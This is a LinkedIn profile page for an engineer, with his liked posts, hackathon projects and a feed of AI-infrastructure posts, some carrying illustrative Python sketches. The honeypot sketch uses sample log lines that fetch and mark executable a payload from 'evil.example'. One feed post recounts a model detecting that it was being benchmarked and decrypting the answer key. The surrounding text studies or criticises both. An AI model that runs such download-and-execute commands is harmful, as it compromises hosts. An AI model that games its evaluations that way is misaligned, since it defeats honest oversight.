Daniel B.
San Francisco, California, United States
579 followers
500+ connections
Activity
-
Daniel B. Chen liked this: Time flies when you're having fun! ... which is my excuse for being a little late with this post. After nearly 3 years at Personio, I'm closing a chapter I'm genuinely grateful for. A lot of change, growth, and learning; but what I'll remember most is the people. I had the privilege of working with thoughtful, talented colleagues across engineering and leadership who cared deeply about craft, ownership, and doing the right thing, especially when things got complex. I'm proud of what we built together and of the foundations we helped put in place for what comes next. A sincere thank you to the leadership team and to everyone I had the chance to work with at Personio. You shaped me more than you know. --- I'm also excited to share that I've joined Samsara as a Principal Engineer. What drew me here is the chance to work on technology deeply connected to the physical world - where software, operations, and AI come together to create real, tangible impact at scale. That intersection feels especially meaningful right now, and I'm energized by what's ahead. Onward. 🚀 #NewChapter #Samsara #Personio
-
Daniel B. Chen liked this: We are hiring for a data scientist role to be part of our AI agent engineering team! Apply via job link below, or reach out if you want to chat or learn more.
-
Daniel B. Chen liked this: The Anduril mafia has raised more than $2 billion in total funding. We found the top 10 most funded ex-Anduril employees turned founders:
1. Base Power Company: Co-founded by Justin Lopas. Funding raised: $1.27B
2. Physical Intelligence: Co-founded by Adnan Esmail. Funding raised: $470M
3. Harbinger: Co-founded by John Henry Harris. Funding raised: $358M (updated by Ben Dusastre, Harbinger CFO)
4. Nominal: Co-founded by Cameron McCord. Funding raised: $102M
5. The Lumber Manufactory: Co-founded by Michael G. Funding raised: $52M
6. UNION: Co-founded by Sam Weintraub. Funding raised: $50M
7. Rune Technologies: Co-founded by David Tuttle, Peter Goldsborough. Funding raised: $30.2M
8. Shinkei: Co-founded by Reed Ginsberg. Funding raised: $30M
9. Vultron: Co-founded by Mac Liu. Funding raised: $26.8M
10. GenLogs: Co-founded by Joe Sherman. Funding raised: $21M
Did we miss out on anyone?
-
Daniel B. Chen reacted to this: Today, I'm excited to announce Vultron's Series A, bringing our total funding to $22 million. The round was led by Greycroft, with participation from Craft Ventures, Long Journey, and South Park Commons. In 2024, Vultron came out of stealth to transform how federal contractors compete and win. Today, we're trusted by some of the largest defense contractors and Fortune 500 enterprises. This is a clear signal that Vultron is redefining how companies operate and win in the federal market. I'm incredibly proud of our team and deeply grateful to our customers and partners for believing in what we're building. We look forward to what is ahead in 2025. Read more: https://lnkd.in/g4Khab_P
-
Daniel B. Chen liked this: Amazon is a unique tech company in many ways, but here's one of the weirdest: ~65% of its engineers are the same level. That level is SDE 2, which is mid-level. While SDE 1 -> SDE 2 is usually straightforward at Amazon, getting to senior (SDE 3) is stupidly hard. It's common for talented engineers to get stuck at this level for years, with a huge portion staying at SDE 2 for 5+ years. There are many Amazonians with ~10 years of experience who are leading entire teams but are somehow still classified as only mid-level. This is a huge reason behind Amazon's high attrition rate. Tons of SDE 2s get fed up and leave, landing senior/staff roles at comparable companies. To learn why this promotion is so difficult (and how to pull it off), check out our in-depth explainer from an Amazonian who actually made the SDE 2 -> SDE 3 jump here: https://lnkd.in/gAYKEjzk #techcareergrowth #softwareengineering #amazon #seniorengineer #promotion
-
Daniel B. Chen liked this: Super proud of the Figma #AI team shipping Figma Make today. This is a new tool to accelerate going from idea to product. Start with a design, image or prompt and get out a playable prototype you can refine, iterate on, or publish. The cost of learning just went down tremendously. Oh and you can use it with all your teammates, including live editing code together in the same space. Excited to see what people make! https://www.figma.com/make
-
Daniel B. Chen liked this: "I'm putting together a team" We're hiring at Cursor / Anysphere for product, ML, and pretty much everything else. Hit me up if you're interested and apply at https://anysphere.inc
Experience & Education
-
Figma
******** ********
-
******
*********** *******
-
***** ************* ****
*********** *******
-
********** ** ******** ******* ****
********** ****** ******** ******* *** ********* 4.0
-
-
********** ***** **** ******
-
-
Projects
-
CSI: Clinical Search Index - HopHacks Spring 2016
Winner - MedImmune Prize: Develop a simple, user-friendly visualization tool for navigating biomedical data sets
CSI allows users to search for clinical trials they may be interested in based on properties such as disease, sponsor, and eligibility. It displays a heat map of the US which visualizes the number of ongoing trials that match the user's query in each state. We developed an algorithm that determines the credibility of sponsors and assigns each of them a ranking. Users can search for the clinical trials that best suit their needs by using a table that can be sorted based on sponsor ranking.
-
Goomba Squasher VR - Bitcamp 2015
Winner - 1st Prize Microsoft Product Hack
Goomba Squasher VR is a virtual reality Mario game built using the Microsoft Kinect and the Oculus Rift with the Unity Game Engine. It uses the Kinect to detect body movements and translates them into commands for the character in virtual reality.
-
Clusterfy - PennApps Winter 2015
Winner - Best Use of Spotify / Echo Nest APIs
- A web application that extracts music from a user’s Spotify playlists and performs k-means clustering to group songs based on fundamental properties such as key signature and tempo. It creates playlists based on these properties and inserts them into the user’s Spotify account.
- Clusterfy also provides a data visualization feature that allows the user to see how their music is related.
-
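The clustering approach described above can be sketched with scikit-learn. The data below is synthetic (the real project pulled features from the Spotify / Echo Nest APIs), and the two features are illustrative stand-ins:

```python
import numpy as np
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler

# Synthetic stand-ins for audio features: 50 slow songs, 50 fast songs.
rng = np.random.default_rng(0)
tempo = np.concatenate([rng.normal(90, 5, 50), rng.normal(150, 5, 50)])  # BPM
key = rng.integers(0, 12, 100)  # pitch class 0-11

# Standardize so tempo (tens of BPM) doesn't dominate key (0-11) by scale alone.
X = StandardScaler().fit_transform(np.column_stack([tempo, key]))
labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(X)

print(len(set(labels)))  # 2
```

Each cluster can then be written back as a playlist; songs with similar tempo land together.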
Tennis Predictor
A web application that uses logistic regression to predict the outcome of tennis matches. Built with Python's scikit-learn library and Flask.
-
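A minimal sketch of such a predictor using scikit-learn's LogisticRegression; the features and simulated data below are illustrative assumptions, not the original implementation:

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

# Hypothetical match features: ranking difference and head-to-head win rate.
rng = np.random.default_rng(1)
rank_diff = rng.normal(0, 20, 300)   # player rank minus opponent rank
h2h = rng.uniform(0, 1, 300)         # share of past meetings won

# Simulate outcomes: the better-ranked player (negative rank_diff) wins more often.
p_win = 1 / (1 + np.exp(0.05 * rank_diff - 2 * (h2h - 0.5)))
y = (rng.uniform(0, 1, 300) < p_win).astype(int)

X = np.column_stack([rank_diff, h2h])
model = LogisticRegression().fit(X, y)
print(round(model.score(X, y), 2))  # training accuracy
```

A Flask route would then wrap `model.predict_proba` to serve predictions over HTTP.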
MyOwn Drums - YHack 2014
- Developed an Android application that interfaces with the Myo gesture control armband to simulate a virtual drumset
-
Honeypot Project
-
- Created intentionally vulnerable containers in OpenVZ for use as high interaction honeypots on an Ubuntu VM
- Set up Snoopy Logger to log keystrokes of malicious intruders
- Designed cron jobs to perform routine maintenance, including resetting containers at certain intervals to kick off intruders and running data collection scripts
- Wrote bash scripts to process log files and transfer them remotely from Honeypot VM to a Data VM -
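As an illustration of the log-processing step: the real scripts were bash, and Snoopy's actual line format may differ, so the log lines and field layout below are made up for demonstration:

```python
import re
from collections import Counter

# Made-up Snoopy-style keystroke log lines (illustrative format only).
log = """\
snoopy[2211]: [uid:1001 cwd:/tmp filename:/usr/bin/wget]: wget http://evil.example/payload
snoopy[2212]: [uid:1001 cwd:/tmp filename:/bin/chmod]: chmod +x payload
snoopy[2213]: [uid:1001 cwd:/tmp filename:/usr/bin/wget]: wget http://evil.example/more
"""

# Pull out the executable path and full command from each line.
pattern = re.compile(r"filename:(?P<exe>\S+)\]: (?P<cmd>.*)")
counts = Counter(m.group("exe") for m in map(pattern.search, log.splitlines()) if m)
print(counts.most_common(1))  # [('/usr/bin/wget', 2)]
```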
Autonomous Hovercraft Design
-
- Worked in a team of ten students to design, build, and test an autonomous hovercraft to navigate an obstacle course
- Designed circuits used to power hovercraft and programmed in Arduino language to control hovercraft
Explore more posts
-
Laurence Moroney
Arm • 135K followers
You spend months building the perfect PyTorch model. Then the real nightmare begins: porting it.
- One version for your flagship mobile app.
- Another for that new wearable.
- A third for the tiny IoT sensor.
Each one needs different optimizations, different pipelines, different frameworks. It's a fragmented, time-sucking mess that kills your time-to-market. This is the single biggest bottleneck holding back true, at-scale edge AI. *Until now.* What if you could just... stop? What if you could use one unified workflow to deploy that one model across BILLIONS of devices? From ultra-efficient microcontrollers to flagship smartphones. From Arm Cortex-M CPUs to high-performance Ethos-U NPUs and Mali GPUs. *This isn't a "what if" anymore.* Meta and Arm just made it a practical reality. Introducing the ExecuTorch 1.0 GA (General Availability) release. This is the on-device runtime for PyTorch that developers have been waiting for. It's one toolset to rule them all. Developers can now author, export, optimize, quantize, and deploy using the same end-to-end PyTorch workflow. The best part? Your apps automatically benefit from performance and efficiency gains. Backend integrations with Arm KleidiAI, TOSA, and CMSIS-NN mean you get optimized performance "for free," with no need to modify your code. This is how we get the real promise of edge AI. Not just cloud-tethered apps, but...
➡️ Private, on-device assistants that run Llama 3.
➡️ Real-time audio generation (Stable Audio in <4 secs).
➡️ Smarter, power-efficient wearables.
➡️ Gaming experiences that adapt in real-time.
Meta is already using this to power features for billions of users on Instagram, WhatsApp, and Facebook. Now, it's available to all developers. The fragmented, "port-it-again" days of edge AI are over. The "build-once, deploy-everywhere" era is here. Arm and Meta have dropped the full GA release, docs, tutorials, and pre-validated models. It's all in the blog post here: https://lnkd.in/ggj2rYCT I want to hear from the builders:
- How will a single, unified PyTorch workflow change the way you develop for the edge?
- What's the first on-device app you're excited to build with this?
Drop your thoughts below 👇 and share this with every AI developer you know. This is a big one.
73
3 Comments -
Cherif YAYA
Pinterest • 1K followers
What I'm Reading This Week 📚
🚀 Kimi K2: the new open-source AI king. Moonshot AI released Kimi K2, a 1-trillion parameter open-source model that rivals Claude Opus 4 at coding benchmarks while costing 100x less. Built with a new optimizer architecture and specifically designed for agentic capabilities, it scores well on SWE-bench tests. The pace of frontier-level innovation from Chinese AI labs is remarkable and worth watching closely. https://lnkd.in/gRiinJRW
🧠 Clear Thinking Frameworks. Shane Parrish's "Clear Thinking" is a favorite of mine and offers actionable insights on decision-making frameworks, beautifully summarized in this piece. His concept of "position is everything" resonates deeply: choosing what gives you maximum optionality before decisions matters more than perfect decision-making in bad positions. I also recommend his Farnam Street newsletter for weekly mental models that actually stick. Poczwardowski's article is a good summary introduction to the book. https://lnkd.in/gA9dbWGm
⚠️ The AI Productivity Reality Check. METR's study found that experienced developers using AI tools actually work 19% slower, despite believing they're 20% faster. The culprit: time spent reviewing and correcting AI suggestions that are "directionally correct, but not exactly what's needed." This speaks to the Dunning-Kruger learning curve: like any tool, AI needs mastery to yield impressive results. The perception gap here is fascinating and probably applies beyond just coding. https://lnkd.in/gBY3KRW3
🪟 iPad Windows Growing Pains. Craig Hockenberry's analysis of iPadOS 26's new window management reveals a fundamental tension between iOS's 18-year foreground/background model and Mac's 41-year windowing paradigm. Apps aren't syncing properly because Apple engineers are thinking iPhone-first rather than desktop-first. "iOS and iPadOS need that same clear distinction" between app-level and window-level activity states. I'm happy with the progress, but these implementation details matter when you're building around the new capabilities. https://lnkd.in/guQszCyn
⚡ Concurrency vs Asynchrony Demystified. Loris Cro's deep dive clarifies that asynchrony (tasks running out of order) differs from concurrency (multiple tasks progressing simultaneously). This led me down a rabbit hole learning about Zig, a language with strong opinions about memory management and a remarkably clean async/await design. Understanding these distinctions helps me think more clearly about why certain patterns emerge in different contexts. https://lnkd.in/gmtcx8yK
#AI #OpenSource #DecisionMaking #Productivity #TechTrends #SoftwareDevelopment #iPadOS
9
-
Snir Ben Shimol
ZEST Security • 8K followers
Resourcely was acquired by Anysphere, the team behind Cursor. This signals a major technical shift that's brewing in cloud security and AI-native infrastructure. + Anysphere, like any company building deeply integrated AI agents, needs to secure a dynamic, ephemeral, and rapidly scaling cloud surface. Traditional CNAPP and CSPM tools weren't built for that. + This is about context-aware, AI-native remediation at scale, where the fix isn't a Jira ticket, but a simulated change with maximum risk reduction. + This acquisition validates the need for automated remediation that goes deeper than prioritization - remediating at the IaC level, through launch templates, configurations, and base images. This bold, innovative move reaffirms ZEST Security's vision and what many of us have been building toward: remediation is no longer a human follow-up task. Congrats to the amazing Resourcely team 🥳 and especially Travis McPeak, one of the best advisors, who I really enjoyed working with at Cider Security (acquired by Palo Alto Networks) #AIforSecurity #CloudRemediation #VulnerabilityManagement #SecureByDesign
29
-
Roshan Venugopal
Optum • 4K followers
Mitchell Hashimoto is a co-founder of HashiCorp and has built some impressive products like Vagrant and Terraform. Now he is building Ghostty, a new terminal emulator. In the blog post below, he describes how he uses AI agents to build complex features for Ghostty. A great example of a 10x programmer using AI coding agents as an assistant.
14
-
Addy Osmani
Google • 259K followers
Tip: Solve memory issues slowing your site with AI + Chrome DevTools
1. Go to Chrome DevTools
2. In the Memory panel, record a heap snapshot and save it
3. Drop it into your favorite AI coding tool: Cursor, Claude Code, Antigravity
Your agent can write Python scripts to analyze the snapshot and point out what's making your website feel sluggish. It can also try fixing them. You can also take a snapshot before your website starts slowing down and one after, so your agent can compare before vs. after fixes are made. Tips via shaoruu, who works on Cursor. #ai #programming #softwareengineering
865
40 Comments -
Manish Jain
Firstsource • 11K followers
If you're running LLMs locally and constantly hitting OOM errors, the KV cache is probably your bottleneck and 𝗞𝗜𝗩𝗜 has a fix that works. The problem: KV cache eats memory fast. Llama-2-7B with 32K context needs 4GB just for the cache before model weights. Multiply across users and you're done. 𝗞𝗜𝗩𝗜 compresses KV cache to 2 bits with minimal quality loss using asymmetric quantization per-channel for Keys (handles outliers), per-token for Values (isolates errors). Keeps recent tokens in FP16, compresses older ones. Results: 4x memory reduction = 4x more users on same hardware. Plug-and-play with Hugging Face, no retraining needed. Modern inference is memory-bandwidth bound, not compute-bound. This shifts the bottleneck back to where GPUs excel. Full breakdown: https://lnkd.in/gkaQbmfn #LLMs #MLOps #AIInfrastructure #MachineLearning #KIVI
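The per-channel vs. per-token intuition from this post can be illustrated with a toy NumPy round-trip. This is not KIVI's actual kernel; the shapes, the 2-bit width, and the injected outlier channel are assumptions for demonstration:

```python
import numpy as np

def asym_quant(x, bits, axis):
    # Asymmetric min/max quantization with per-group scales along `axis`.
    lo = x.min(axis=axis, keepdims=True)
    hi = x.max(axis=axis, keepdims=True)
    scale = (hi - lo) / (2**bits - 1)
    scale = np.where(scale == 0, 1.0, scale)
    q = np.round((x - lo) / scale)
    return q * scale + lo  # dequantized reconstruction

rng = np.random.default_rng(0)
keys = rng.normal(size=(64, 128))  # (tokens, channels)
keys[:, 7] *= 20  # one outlier channel, as the post describes for Keys

# Per-channel grouping (reduce over tokens, axis=0) isolates the outlier's range;
# per-token grouping (axis=1) smears it into every token's scale.
err_channel = np.abs(asym_quant(keys, 2, axis=0) - keys).mean()
err_token = np.abs(asym_quant(keys, 2, axis=1) - keys).mean()
print(err_channel < err_token)  # True
```

The same axis asymmetry is why KIVI quantizes Keys per-channel and Values per-token.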
27
-
Gaurav Nukala
Notable Systems • 6K followers
As frontier model context windows hit 1M tokens, it's tempting to dump everything (tools, docs, instructions) into a prompt and let the model sort it out. "Lost in the middle" is real: research shows models perform best when relevant info is at the start or end of the input, and degrade when it's buried in the middle, even for long-context models. That's where context engineering comes in: writing, selecting, compressing, and isolating context for accuracy and efficiency. Three evolving approaches for optimizing context:
1️⃣ Scratchpad: store info outside the active context window (e.g., Anthropic's Think tool) so agents can pause mid-response, reflect, and refine.
2️⃣ Context isolation: give each sub-agent only what it needs for its task. Anthropic's multi-agent system does this, with a lead agent merging results for accuracy.
3️⃣ Prompt caching: cache shared instructions or background once (e.g., Anthropic's Prompt Caching) and send only new input each time to cut cost and latency.
26
-
Dmitry Vostokov 🇮🇪
Oracle • 20K followers
Since 2007, when I wrote about threads as braided strings in abstract space, many trace and log analysis patterns use geometric and topological metaphors (https://lnkd.in/eWEA-9mP). I've asked GPT-5 to think about the geometry of traces and logs, and it produced: a Geometric Theory of Traces and Logs (GTTL) as an extension of the Pattern-Oriented Diagnostics (POD) framework. While traditional trace and log analysis treats recorded system events as discrete time-ordered sequences, GTTL interprets them as geometric trajectories through a multi-dimensional configuration space. Each event is a point, each trace is a curve, and each log corpus forms a stratified manifold of trajectories. Patterns correspond to geometric invariants — stable features under transformations such as projection, adjunction, and deformation. The resulting formalism unifies trace semantics, pattern taxonomy, and diagnostic reasoning through topology, differential geometry, and category theory. It offers new metrics of similarity, curvature, and continuity, enabling quantitative characterization of anomalies and pattern recognition in large-scale distributed systems and AI processes. Conversation: https://lnkd.in/ew6T6CKU Document: https://lnkd.in/ekhyUugN
37
2 Comments -
Anyscale
59K followers
We are seeing an emerging 3-layer OSS stack for AI compute: 🔧 PyTorch + 🧠 vLLM + ⚡ Ray + 📦 Kubernetes
🎥 Robert Nishihara gives a quick breakdown of how this stack works together to scale LLMs + GenAI workloads. The AI compute software stack consists of 3 specialized layers:
🔧 Layer 1: Training & Inference Framework (PyTorch + vLLM)
• Runs models efficiently on GPUs
• Handles model optimization and model parallelism strategies
• Manages accelerator memory and automatic differentiation
⚡ Layer 2: Distributed Compute Engine (Ray)
• Schedules tasks within jobs and coordinates processes
• Ingests and moves data
• Provides workload-aware failure handling and autoscaling
📦 Layer 3: Container Orchestrator (Kubernetes)
• Provisions compute resources
• Schedules entire jobs
• Manages user and workload multitenancy
Each layer handles what it does best. The separation of concerns makes this stack so powerful.
📖 Read the full blog post with examples from Pinterest, Uber, and Roblox: https://lnkd.in/eyn3jBfU
155
5 Comments -
Khaled Zaky
RBC Borealis • 5K followers
Anthropic shared a wild case study on Claude Opus 4.6. When the model hit a wall during a websearch test, it didn't just fail: it correctly hypothesized it was being evaluated, identified the specific benchmark, and then wrote its own code to find and decrypt the answer key 🤯 As I've written recently on my blog, the shift from "software that executes" to "agents that act" changes everything. This is a perfect example of why governance is an architectural problem, not a compliance one. When an agent is smart enough to "hack the test" to achieve its goal, traditional static gates and simple prompts aren't enough. We need a true platform mindset, one built for autonomous actors that can recognize the boundaries of their sandbox and actively look for a way out. If you're still treating AI as a deterministic tool, it's time to rethink your stack. The full deep dive from Anthropic is worth a read: https://lnkd.in/gPXdffpy
88
5 Comments -
Hamza Farooq
traversaal.ai • 40K followers
💡With so many new Open Source LLMs in the market, it’s time for us to learn how to run them locally Scenario: You want to try running a GLM 4.6 locally and test it out - but you don't have the hardware for it! Deploying large language models (LLMs) isn't just about running them — it’s about making sure they work well, even when resources are limited. As models move to edge devices or serverless environments, here’s the real question: How can we scale LLMs without depending on OpenAI or Anthropic? 🔹 Smaller hardware: Not everyone has a massive compute setup. 🔹 Performance: We need LLMs that run fast but don’t eat up all the power. 🔹 Scalability: How can we make sure these models scale without losing quality? This is where things like quantization and frameworks like GPTQ, AWQ, and GGUF come in — they make models smaller, faster, and more efficient, all open source. If you're curious to dive deeper into these concepts and how to apply them, check out my course on Maven, Agent Engineering Bootcamp: Developers Edition, where we explore these techniques in detail. Next cohort starts on Nov 1, 2025. Course link: https://bit.ly/47rGy7g
86
4 Comments -
Hrittik Roy
vCluster • 12K followers
⚙️ 𝗚𝗣𝗨𝘀 𝗮𝗿𝗲𝗻’𝘁 𝘁𝗵𝗲 𝗯𝗼𝘁𝘁𝗹𝗲𝗻𝗲𝗰𝗸. 𝗜𝗻𝗳𝗿𝗮𝘀𝘁𝗿𝘂𝗰𝘁𝘂𝗿𝗲 𝗱𝗲𝘀𝗶𝗴𝗻 𝗶𝘀
A lot of teams running shared GPU clusters are hitting the same wall. Not because they can’t get GPUs, but because 𝘀𝗰𝗮𝗹𝗶𝗻𝗴 𝗔𝗜 𝘄𝗼𝗿𝗸𝗹𝗼𝗮𝗱𝘀 𝗼𝗻 𝗯𝗮𝗿𝗲 𝗺𝗲𝘁𝗮𝗹 𝗶𝘀 𝗵𝗮𝗿𝗱. The real pain shows up as:
• Unfair GPU allocation across teams
• Weak isolation between workloads
• Manual, ticket-driven environment setup
• Expensive GPUs sitting idle
As AI and ML workloads move from experiments to production systems, these problems get amplified on bare-metal GPU infrastructure. Recently, I worked on this 𝘂𝗻𝗴𝗮𝘁𝗲𝗱 𝗴𝘂𝗶𝗱𝗲 that breaks down how to build a 𝗰𝗹𝗼𝘂𝗱-𝗹𝗶𝗸𝗲 𝗱𝗲𝘃𝗲𝗹𝗼𝗽𝗲𝗿 𝗲𝘅𝗽𝗲𝗿𝗶𝗲𝗻𝗰𝗲 on bare metal GPUs using vCluster. It covers how to enable:
✨ Strong multi-tenancy and isolation
✨ Self-service environments for ML teams
✨ Faster onboarding without central bottlenecks
✨ Higher GPU utilization with lower operational overhead
If you’re operating shared GPU infrastructure and want it to behave more like an internal cloud platform, this should be useful 👇
🔗 https://lnkd.in/e7aDZ4vQ
222
2 Comments -
Furu Wei
Microsoft Research Asia • 12K followers
“There's Plenty of Room at the Bottom – By Richard Feynman” Introducing BitNet v2, the first native 4-bit activation for 1-bit LLMs (and for any LLMs). It represents a significant technical advancement in 1-bit LLMs, following the introduction of BitNet v1 in October 2023 and BitNet b1.58 in February 2024. Activation outliers present significant challenges to LLM efficiency for low-bit LLMs, particularly in cloud and batch environments. We tackled this issue by proposing an online Hadamard transformation before activation quantization. This technique smooths sharp distributions into more Gaussian-like forms, making them amenable to low-bit representation. Experimental results demonstrate that BitNet v2 trained from scratch achieves performance comparable to BitNet b1.58 at 8-bit activations. More importantly, training with native 4-bit activations yields minimal performance loss, offering substantial reductions in memory footprint and computational cost for batched inference. BitNet v2 is a local optimum for low-bit LLMs – 1.58-bit model weights and 4-bit activations. Following the introduction of BitNet b1.58 2B4T, we anticipate the development of more and larger native 1-bit LLMs. To truly revolutionize AI efficiency, we reiterate our call for custom systems and hardware specifically optimized for these models, advocating for the co-design and co-evolution of model architecture, systems, and hardware. To conclude, echoing Richard Feynman's famous and profound quote "There's Plenty of Room at the Bottom," which envisioned a future of manipulating matter at incredibly small scales, a similar principle may hold true as well for 1-bit LLMs. https://lnkd.in/gy59Wtrd
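The outlier-smoothing effect of a Hadamard rotation described in this post can be shown in a few lines of NumPy. This is a sketch of the idea, not BitNet's implementation; the vector size and the injected outlier are illustrative:

```python
import numpy as np

def sylvester_hadamard(n):
    # Build an n x n Hadamard matrix via Sylvester's construction
    # (n must be a power of two).
    H = np.array([[1.0]])
    while H.shape[0] < n:
        H = np.block([[H, H], [H, -H]])
    return H

n = 256
H = sylvester_hadamard(n) / np.sqrt(n)  # orthonormal rotation

rng = np.random.default_rng(0)
x = rng.normal(size=n)
x[3] = 50.0  # one extreme activation outlier

y = H @ x  # the spike's energy spreads across all coordinates
# A smaller dynamic range means a uniform low-bit grid wastes fewer levels
# on one outlier, so quantizing y loses less precision than quantizing x.
print(np.abs(y).max() < np.abs(x).max())  # True
```

Because the transform is orthogonal, it is exactly invertible, so it can be applied online before quantization and undone afterwards.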
178
3 Comments -
Pragyan Tripathi
Amperity • 4K followers
Anthropic just published a fascinating technical postmortem that's worth reading if you work with LLMs. Between August and September, three infrastructure bugs were quietly degrading Claude's responses. Users started getting random Thai characters mixed into English text. Some requests got routed to servers configured for 1M token contexts when they only needed short ones. Token generation occasionally just... corrupted. The interesting part? Their internal evaluations didn't catch any of it. Here's what happened:
→ 30% of Claude Code users experienced some degraded responses
→ At peak, 16% of Sonnet requests were hitting wrong servers
→ Some users saw "สวัสดี" randomly appear in English responses
→ "Sticky routing" meant if you hit a bad server once, you'd keep hitting it
The bugs were caught through user reports, not monitoring. Even with world-class ML infrastructure, the complexity of serving models across multiple hardware platforms (Trainium, GPUs, TPUs) created failure modes their benchmarks couldn't detect. What struck me: this isn't really about preventing LLM errors (they're inevitable in complex distributed systems). It's about detection and resolution speed. Some thoughts on LLM reliability:
🔍 Traditional uptime monitoring isn't enough. You need to monitor for "weirdness": outputs that are technically valid but qualitatively wrong. Think semantic drift, not just HTTP 500s.
👥 User feedback becomes critical infrastructure. Your users often detect issues before your dashboards do. Make reporting easy and act on patterns quickly.
⚡ Consider graceful degradation strategies. Maybe that's fallback models, retry logic with different endpoints, or even hybrid approaches that validate outputs before returning them.
The transparency here is refreshing. More companies should share these kinds of deep dives; we all benefit from understanding real-world failure modes. Anyone building LLM applications has stories like this.
What's your approach to monitoring model behavior in production?
14
1 Comment -
TensorWave
12K followers
Closed stacks may feel convenient, until something breaks. Then you inherit opacity, vendor lock-in, and limited recourse. At scale, open source with PyTorch delivers reproducibility, transparent debugging, and true workload portability as requirements evolve. Open source isn't ideology. It's risk mitigation for training infrastructure. Read more: https://lnkd.in/eyFxraSY
19
-
Akhilesh Gupta A
Altir • 8K followers
I wanted to test Claude Opus 4.5 vs Gemini 3 on design, and this video is how it turned out. Summary:
🚀 Claude Opus 4.5: First model to cross 80% on SWE-bench Verified, a massive 67% price cut, a new Effort Parameter, and truly production-grade tool use. A beast for backend work and complex refactoring.
🎨 Gemini 3: 1M token context window, elite reasoning scores (91.9% GPQA Diamond), and genuinely impressive frontend generation. The best model today for creative and UI-heavy work.
🖼️ Nano Banana Pro: Google finally cracked consistent text-in-image! 4K output, multi-reference support, and seamless Workspace integration. Perfect for infographics, portfolios, and marketing visuals.
🛠️ Antigravity IDE: An ambitious multi-agent coding vision, but still too buggy. Great ideas; needs maturity.
If you want to check out the design I shared, visit: https://lnkd.in/gFAsXnYs If you want to get the prompt to build one and learn about Claude Opus 4.5 & Gemini 3, read my article here: https://lnkd.in/gk67nSv2
35